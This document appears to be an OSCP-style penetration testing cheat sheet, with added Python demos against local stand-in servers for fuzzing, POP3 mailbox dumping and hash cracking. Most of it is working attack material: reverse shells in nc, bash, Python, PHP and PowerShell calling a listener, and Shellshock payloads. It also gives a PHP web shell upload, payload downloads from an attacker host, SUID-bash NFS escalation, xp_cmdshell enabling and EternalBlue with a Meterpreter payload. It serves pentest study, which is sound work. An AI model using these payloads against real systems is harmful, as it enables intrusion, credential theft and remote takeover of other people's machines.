Offensive Security Testing Guide
This cheat sheet is a compilation of the commands we learned while exploiting vulnerable machines.
The commands below may not be enough for you to obtain your Offensive Security Certified Professional (OSCP).
So... Try Harder!
Information Gathering
Operating System
Windows
Interesting Paths
"Documents and Settings"/Administrator/Desktop
XAMPP files worth reading through a file-read or LFI bug (file:// URLs as used in a browser or an LFI payload):
file:///C:/xampp/readme_en.txt
file:///C:/xampp/passwords.txt
file:///C:/xampp/webdav/webdav.txt
file:///C:/xampp/apache/conf/extra/httpd-dav.conf
file:///C:/xampp/apache/conf/extra/httpd-xampp.conf
file:///C:/xampp/apache/logs/access.log
file:///C:/xampp/apache/logs/error.log
file:///C:/xampp/security/webdav.htpasswd
file:///C:/xampp/htdocs/dashboard/phpinfo.php
file:///C:/xampp/phpmyadmin/config.inc.php
file:///C:/xampp/php/logs/php_error_log
file:///C:/xampp/mysql/bin/my.ini
C:\Users\<User>\AppData\Local\Temp
#Outlook mail data (.pst/.ost): email addresses and messages
C:\Users\<User>\AppData\Local\Microsoft\Outlook
Active Connections
netstat -anob #requires elevation; -b shows the owning executable
netstat -ano #without elevation; map the PID with tasklist
tasklist #running processes and their PIDs
User or System Enumeration
echo %username%
Shell to Meterpreter Upgrade
use post/multi/manage/shell_to_meterpreter
Linux
Identify OS
uname -a
cat /etc/lsb-release
Exploring Directories
ls *
ls -R <path> #lists directory tree recursively
ls -la * #list long format including hidden files
Identify Filetype
file <filename>
File Compression/Decompression
tar xvf <filename>
Retrieve Password Hashes
cat /etc/shadow | grep '\$' | cut -d ':' -f -2 #needs root; prints user:hash for accounts that actually have a hash
Execute a Command 10 Times
for i in {1..10}; do whoami; done
Steganography
binwalk -e <picture_file>
exiftool <picture_file>
steghide extract -sf <picture_file> #prompts for a passphrase; press Enter to try an empty one
Web Application Request Parameter
wfuzz -c -z file,burp-parameter-names.txt --hh=19 http://<target_URL>/<page>?FUZZ=test #--hh hides responses of the baseline length (19 chars here); measure yours first with a junk parameter name
http://wfuzz.readthedocs.io/en/latest/user/basicusage.html#fuzzing-parameters-in-urls
https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/burp-parameter-names.txt
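Added example (not part of the original cheat sheet): a Python script that does what the wfuzz line above does, including the --hh baseline logic, against a constructed local stand-in for the target page. The demo server, the candidate names in DEMO_NAMES and the hidden "debug" parameter it reacts to are all invented for the demo; on a real job the inputs are burp-parameter-names.txt and the target URL.

```python
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError
from urllib.parse import parse_qs, quote, urlparse
from urllib.request import urlopen

# Constructed candidate list standing in for burp-parameter-names.txt.
DEMO_NAMES = ["id", "page", "user", "debug", "cmd", "lang"]


class _DemoPage(BaseHTTPRequestHandler):
    """Constructed stand-in for the target page: it renders extra content
    only when the hidden 'debug' parameter is present (hypothetical behaviour)."""

    def do_GET(self):
        params = parse_qs(urlparse(self.path).query)
        body = b"<html><body>Welcome</body></html>"
        if "debug" in params:
            body = b"<html><body>Welcome<!-- build 1.2.3, db=prod --></body></html>"
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # silence request logging
        pass


def start_demo_server():
    """Start the constructed target on a free localhost port (port 0)."""
    srv = HTTPServer(("127.0.0.1", 0), _DemoPage)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def response_length(url):
    """Length in bytes of the response body (wfuzz's 'Chars' column)."""
    try:
        with urlopen(url, timeout=5) as resp:
            return len(resp.read())
    except HTTPError as err:          # 4xx/5xx bodies count as well
        return len(err.read())


def fuzz_params(page_url, names, value="test"):
    """Equivalent of `wfuzz -z file,<names> --hh=<baseline> <page>?FUZZ=<value>`.

    The baseline is the body length for a parameter name the page cannot know
    about; every candidate whose length differs from it is reported.
    Returns (baseline_length, [hits...]).
    """
    baseline = response_length(f"{page_url}?{quote('zz_not_a_param')}={quote(value)}")
    hits = []
    for name in names:
        length = response_length(f"{page_url}?{quote(name)}={quote(value)}")
        if length != baseline:
            hits.append(name)
    return baseline, hits


if __name__ == "__main__":
    server = start_demo_server()
    url = f"http://127.0.0.1:{server.server_port}/index.php"
    base, found = fuzz_params(url, DEMO_NAMES)
    print(f"baseline {base} chars; parameters that change the response: {found}")
    server.shutdown()
```

Pages that echo unknown parameter names back, or that embed timestamps or CSRF tokens, change length on every request; on those, filter on word or line count (--hw/--hl) or on status code instead of --hh.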
Web Application Wordlist (from Site Content)
cewl <target URL> > wordlist.txt #words scraped from the site, for directory and password guessing
Web Application Sensitive Files
Apache
/etc/apache2/sites-enabled/000-default.conf
WordPress
/wp-config.php
Mail Server
POP3
USER <username>
PASS <password>
LIST #lists message numbers and their sizes
RETR <message_number> #retrieve a particular message
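Added example (not from the original page): the same POP3 session with both sides spelled out. _serve_client is a constructed minimal server so the exchange runs offline; dump_mailbox is the client side and sends exactly USER, PASS, LIST and RETR as listed above, and check_credentials is the single USER/PASS probe a dictionary attack repeats per guess. The account, password and mailbox contents are invented for the demo.

```python
import poplib
import socket
import threading

# Constructed account and mailbox for the demo (not real data).
DEMO_USER, DEMO_PASS = "alice", "Winter2019!"
DEMO_MESSAGES = [
    b"From: bob@example.test\r\nSubject: vpn\r\n\r\nThe VPN password is S3cret-vpn.\r\n",
    b"From: it@example.test\r\nSubject: reminder\r\n\r\nPlease rotate your passwords.\r\n",
]


def _serve_client(conn):
    """Constructed POP3 server side: just enough of RFC 1939 for the session above."""
    rfile = conn.makefile("rb")

    def send(line):
        conn.sendall(line + b"\r\n")

    send(b"+OK demo POP3 ready")
    user, authed = None, False
    for raw in rfile:                                   # one command per line
        cmd, _, arg = raw.strip().partition(b" ")
        cmd = cmd.upper()
        if cmd == b"USER":
            user = arg.decode(errors="replace")
            send(b"+OK")                                # never reveal whether the user exists
        elif cmd == b"PASS":
            authed = user == DEMO_USER and arg.decode(errors="replace") == DEMO_PASS
            send(b"+OK logged in" if authed else b"-ERR invalid credentials")
        elif cmd == b"QUIT":
            send(b"+OK bye")
            break
        elif not authed:
            send(b"-ERR authenticate first")
        elif cmd == b"STAT":
            send(b"+OK %d %d" % (len(DEMO_MESSAGES), sum(len(m) for m in DEMO_MESSAGES)))
        elif cmd == b"LIST":
            send(b"+OK %d messages" % len(DEMO_MESSAGES))
            for num, msg in enumerate(DEMO_MESSAGES, 1):
                send(b"%d %d" % (num, len(msg)))      # "message_number size"
            send(b".")                                  # end of multi-line response
        elif cmd == b"RETR":
            num = int(arg) if arg.isdigit() else 0
            if 1 <= num <= len(DEMO_MESSAGES):
                msg = DEMO_MESSAGES[num - 1]
                send(b"+OK %d octets" % len(msg))
                conn.sendall(msg)                       # demo bodies have no '.'-only lines, so no byte-stuffing
                send(b".")
            else:
                send(b"-ERR no such message")
        else:
            send(b"-ERR unknown command")
    conn.close()


def start_demo_server():
    """Listen on a free localhost port and serve each client in a thread."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def accept_loop():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:                             # listening socket closed
                return
            threading.Thread(target=_serve_client, args=(conn,), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv


def check_credentials(host, port, user, password):
    """USER/PASS only: the probe a dictionary attack (hydra ... pop3) repeats per guess."""
    pop = poplib.POP3(host, port, timeout=5)
    try:
        pop.user(user)
        pop.pass_(password)
        return True
    except poplib.error_proto:                          # server answered -ERR
        return False
    finally:
        pop.quit()


def dump_mailbox(host, port, user, password):
    """The cheat-sheet session (USER, PASS, LIST, RETR n) driven by poplib.
    Returns the messages as text, in mailbox order."""
    pop = poplib.POP3(host, port, timeout=5)
    pop.user(user)
    pop.pass_(password)
    _, listing, _ = pop.list()                          # entries like b"1 74"
    messages = []
    for entry in listing:
        num = int(entry.split()[0])
        _, lines, _ = pop.retr(num)                     # lines arrive without their CRLF
        messages.append(b"\r\n".join(lines).decode(errors="replace"))
    pop.quit()
    return messages


if __name__ == "__main__":
    server = start_demo_server()
    port = server.getsockname()[1]
    print("wrong password accepted:", check_credentials("127.0.0.1", port, DEMO_USER, "wrong"))
    for i, msg in enumerate(dump_mailbox("127.0.0.1", port, DEMO_USER, DEMO_PASS), 1):
        print(f"--- message {i} ---\n{msg}")
    server.close()
```

USER/PASS sends the password in clear text, which is why credential reuse on port 110 is worth testing and why sniffing that port pays off. Some real servers already answer -ERR at USER for unknown accounts, which turns the login into a user enumeration oracle; the stub above deliberately does not.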
Hash & Encryption
Identify Hash
hash-identifier #guesses from format and length; a bare 32-hex value could be MD5, NTLM or MD4, so confirm with a known plaintext when you can
Cracking Hash
hashcat64.exe --force -m 1400 -a 0 <hash_file> <dictionary_file> #-m 1400 = SHA-256, -a 0 = straight dictionary; --force ignores driver warnings
john <hash_file> --format=mysql-sha1 --wordlist=<dictionary_file> #MySQL 4.1+ hashes (41 chars starting with *)
john <hash_file> --format=raw-sha1 --wordlist=<dictionary_file>
Tools
https://github.com/UltimateHackers/Hash-Buster
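Added example (not from the original page): a small Python equivalent of the identify-then-crack workflow above. It guesses the format from length and prefix the way hash-identifier does, computes MySQL 4.1+ (mysql-sha1), raw SHA-1, SHA-256 and MD5, and runs a straight dictionary attack. DEMO_WORDLIST and DEMO_TARGETS are constructed for the demo; the targets are generated from the wordlist so the run checks itself.

```python
import hashlib

# Constructed wordlist (stand-in for a rockyou-style dictionary).
DEMO_WORDLIST = ["password", "letmein", "Winter2019!", "admin123", "qwerty", "welcome1"]


def mysql_sha1(password):
    """MySQL 4.1+ PASSWORD(): '*' + upper(hex(SHA1(SHA1(pw)))). john --format=mysql-sha1."""
    inner = hashlib.sha1(password.encode()).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


# Format name -> hash function, with the matching john/hashcat switches.
HASH_FUNCS = {
    "raw-md5":    lambda p: hashlib.md5(p.encode()).hexdigest(),     # john raw-md5    / hashcat -m 0
    "raw-sha1":   lambda p: hashlib.sha1(p.encode()).hexdigest(),    # john raw-sha1   / hashcat -m 100
    "raw-sha256": lambda p: hashlib.sha256(p.encode()).hexdigest(),  # john raw-sha256 / hashcat -m 1400
    "mysql-sha1": mysql_sha1,                                        # john mysql-sha1 / hashcat -m 300
}

_HEX = set("0123456789abcdefABCDEF")


def identify_hash(digest):
    """hash-identifier reduced to the formats above: guess from prefix and length.
    A bare 32/40/64-hex string is ambiguous (32 hex is also NTLM, MD4, LM...),
    so treat the answer as candidates, not a verdict."""
    digest = digest.strip()
    if digest.startswith("*") and len(digest) == 41 and set(digest[1:]) <= _HEX:
        return ["mysql-sha1"]
    if not digest or not set(digest) <= _HEX:
        return []
    return {32: ["raw-md5"], 40: ["raw-sha1"], 64: ["raw-sha256"]}.get(len(digest), [])


def crack(digest, wordlist):
    """Straight dictionary attack (hashcat -a 0): every candidate word under every
    plausible format. Returns (format, plaintext) or None."""
    target = digest.strip().lower()
    for fmt in identify_hash(target):
        func = HASH_FUNCS[fmt]
        for word in wordlist:
            if func(word).lower() == target:
                return fmt, word
    return None


def crack_all(targets, wordlist):
    """Crack a {label: hash} mapping; uncracked entries map to None."""
    return {label: crack(h, wordlist) for label, h in targets.items()}


# Constructed targets, generated from the functions above so the demo is self-checking.
DEMO_TARGETS = {
    "web_admin": HASH_FUNCS["raw-sha256"]("Winter2019!"),
    "db_root":   mysql_sha1("admin123"),
    "legacy":    HASH_FUNCS["raw-md5"]("letmein"),
    "strong":    HASH_FUNCS["raw-sha1"]("correct horse battery staple"),  # not in the wordlist
}

if __name__ == "__main__":
    for label, result in crack_all(DEMO_TARGETS, DEMO_WORDLIST).items():
        print(f"{label:10} {DEMO_TARGETS[label]}  ->  {result}")
```

For more than a handful of hashes use hashcat or john; the point here is to see what -m 1400 and --format=mysql-sha1 actually compute, and that identification by length alone is a guess. Salted and iterated formats (sha512crypt, bcrypt, NTLMv2) are deliberately not covered.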
Dictionary Attack
SSH
hydra -L <user_dict> -P <pwd_dict> <victim_ip_addr> ssh
Cracking ZIP
fcrackzip -u -D -p <dictionary_file> <zip_file>
RSA Attack
RsaCtfTool.py --publickey <decoder.pub> --uncipher <pass.crypt>
Reference: https://github.com/Ganapati/RsaCtfTool
Decode Base64
base64 -d <<< <based_64_encoded_value>
Convert Hexadecimal to Text
echo <hexadecimal_value> | xxd -r -p
Convert Decimal to Hexadecimal, then to Text (Python 2 only; str.decode('hex') no longer exists in Python 3)
python -c "print format(<decimal_value>, 'x').decode('hex')"
Thick Client Application
Executable File
strings <executable_file>
Disassemble Java Class File
javap -c <java_class>.class | tee <output_file>.txt
Connection Establishment (Reverse Shell)
Listener (Attacker)
nc -nvlp 8099
nc -nvlp 8099 -u #UDP
Request (Victim, connects back to the listener)
/bin/nc -e /bin/sh <listener_ip> 8099
nc -e /bin/bash <listener_ip> 8099 #only nc builds compiled with -e (e.g. nc.traditional); use the bash /dev/tcp form when -e is missing
bash -i >& /dev/tcp/<listener_ip>/8099 0>&1
Exploitation using Shell
SSH
ssh -i <rsa_private_key_file>.key <user>@<target_IP_address>
SSH (IPv6)
ssh -6 -i <rsa_private_key_file>.key <user>@<target_IP_address>
RDP
rdesktop -u <username> -p <password> <target_ip_address>
Python
python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('<listener_ip>',8099));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);"
Database
MSSQL
sqsh -S <target_IP_address> -U <username>
MySQL
mysql -h <target_IP_address> -u <username> -p
Application
WebDav
cadaver http://<target_ip>/<webdav_path>/
put <webshell>
Shellshock
wget -U "() { test;};echo \"Content-type: text/plain\"; echo; /bin/bash -c 'echo vulnerable'" http://<target_ip_address>/cgi-bin/<vulnerable>.cgi #the User-Agent lands in the CGI's environment; a vulnerable bash parses the function body and runs the trailing commands
wget -U "() { test;};echo \"Content-type: text/plain\"; echo; /bin/bash -i >& /dev/tcp/<listener_ip>/8099 0>&1" http://<target_ip_address>/cgi-bin/<vulnerable>.cgi
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" 'http://<target_ip_address>/<vulnerable>.sh'
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/<listener_ip>/8099 0>&1'" http://<target_ip_address>/cgi-bin/<vulnerable>
Proxy
SSH through an HTTP proxy (CONNECT)
proxytunnel -p <victim_ip_addr>:<port> -d 127.0.0.1:22 -a 8099 #local port 8099 is tunnelled through the proxy to 127.0.0.1:22 as seen from the proxy host
ssh <user>@127.0.0.1 -p 8099 "/bin/sh"
File/Content Transfer
Linux
wget http://<attacker_ip>/<file> -O /<path>/<filename> 2>&1
wget --no-check-certificate https://<attacker_ip>/<file>
curl -O http://<attacker_ip>/<file> 2>&1
fetch -o <filename> http://<attacker_ip>/<file> #FreeBSD
FTP
binary #set transfer mode to BINARY, needed for non-ASCII files (ftp client command)
Raw protocol commands, e.g. when driving port 21 from netcat (RETR also needs a data connection set up with PASV or PORT):
LIST C:\\<Directory Name>
RETR C:\\<Directory Name>\\<File Name>
Netcat
Attacker (start the listener first)
nc -lnvp 8099 > <file>.txt
Victim
nc <attacker_ip_address> 8099 < <file>.txt
Compare a checksum of the file on both ends afterwards; netcat gives no indication of a truncated transfer.
HTTP PUT Method
curl -v -X PUT -d '<?php system ($_GET["cmd"]); ?>' http://<target_ip_addr>/<path>/shell.php
NFS (share exported with no_root_squash; first two commands run as root on the attacker, where the share is mounted)
cp /bin/bash /mnt/<share> #a bash binary that runs on the target (same architecture and compatible libc)
chmod 4777 /mnt/<share>/bash
./bash -p #on the victim, from the exported directory; -p keeps the effective uid of 0
Powershell
C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe wget "http://<attacker_ip>/<file>" -outfile "<output_file_name>"
powershell -command "(New-Object System.Net.WebClient).DownloadFile('http://<attacker_ip>/<file>', '<output_file_name>')"
powershell -command "Invoke-WebRequest 'http://<attacker_ip>/<file>' -OutFile '<output_file_name>'"
Certutil
certutil -urlcache -split -f http://<attacker_ip>/<file> <output_file_name>
Code Execution
Python
import subprocess
subprocess.check_output(['whoami']) #run a command and capture its output
import os
os.system('nc -e /bin/bash <attacker_ip> 8099') #reverse shell back to the listener
PHP
<?php passthru("rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc <attacker_ip_address> 8099 > /tmp/f"); ?>
MS SQL
EXEC sp_configure N'show advanced options', 1
go
RECONFIGURE -- apply this first, otherwise enabling xp_cmdshell fails because it is an advanced option
go
EXEC sp_configure N'xp_cmdshell', 1
go
RECONFIGURE
go
EXEC xp_cmdshell 'cd C:\<path_to_bind_shell>\ & <bind_shell_name>.exe'; -- runs as the SQL Server service account; the query blocks until the process exits
go
Oracle iSQL*Plus
exec dbms_java.grant_permission('SYSTEM', 'SYS:java.io.FilePermission', '<<ALL FILES>>', 'execute');
begin
  dbms_java.grant_permission('SYSTEM', 'java.io.FilePermission', '<<ALL FILES>>', 'execute');
  dbms_java.grant_permission('SYSTEM', 'java.lang.RuntimePermission', '*', 'writeFileDescriptor');
end;
/
exec javacmd('<command>'); -- javacmd is a Java stored procedure wrapping Runtime.getRuntime().exec() that you create beforehand; its source is not included here
PowerShell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<listener_ip>',8099);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Reference:
Reverse Shell Cheat Sheet | pentestmonkey
TTY Shell
Python
which python
which bash
python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
Perl
/usr/bin/perl -e 'exec "/bin/sh"'
VIM
:set shell=/bin/bash
:shell
AWK
awk 'BEGIN {system("/bin/sh")}'
Reference:
NETSEC - Spawning a TTY Shell
SANS Penetration Testing | Escaping Restricted Linux Shells
Buffer Overflow
Reference: http://www.axcelsec.com/2018/05/buffer-overflow.html
Remote Code Execution (Windows)
MS17-010
nasm -f bin eternalblue_kshellcode_x86.asm #writes the kernel shellcode to eternalblue_kshellcode_x86
msfvenom -p windows/meterpreter/reverse_tcp -f raw -o msf.bin EXITFUNC=thread LHOST=<Local IP> LPORT=8099
cat eternalblue_kshellcode_x86 msf.bin > sc_x86.bin #kernel stub first, then the userland payload
python eternalblue_exploit7.py <Target IP> shellcode/sc_x86.bin #start a matching multi/handler on LPORT first; build the x64 variants the same way for 64-bit targets
Reference: https://github.com/vivami/MS17-010
Post Exploitation
Reference: https://www.axcelsec.com/2019/05/post-exploitation.html